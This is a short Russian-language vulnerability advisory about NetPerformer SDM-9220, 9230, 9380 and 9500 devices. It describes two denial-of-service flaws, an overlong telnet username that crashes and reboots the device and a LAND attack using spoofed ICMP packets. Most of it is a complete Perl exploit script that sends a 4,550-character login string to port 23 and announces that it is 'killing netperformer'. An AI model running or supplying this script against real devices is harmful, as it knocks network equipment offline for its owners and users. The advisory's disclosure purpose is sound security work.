Программа: NetPerformer SDM-9220, NetPerformer SDM-9230, NetPerformer SDM-9380, NetPerformer SDM-9500
Злоумышленник может вызвать отказ в обслуживании.
1. Чрезмерно длинное имя пользователя, посланное к службе telnet, приведет к аварийному завершению работу и перезагрузки уязвимого устройства.
Эксплоит:
# __START_CODE
#
#!/usr/bin/perl
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "23",
Proto => "TCP"))
{
print "Modhiar'000 ..... killing netperformer ... $ARGV[0]
port 23...";
sleep(1);
print $socket "LOGIN " . "A" x 4550 . "BCDE\r\n";
sleep(1);
print $socket "PASS " . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:23\n";
}
# __END_CODE
2. Удаленный пользователь может послать поддельный ICMP пакет, в котором адрес источника совпадает с адресом устройства (LAND нападение), чтобы нарушить работу устройства.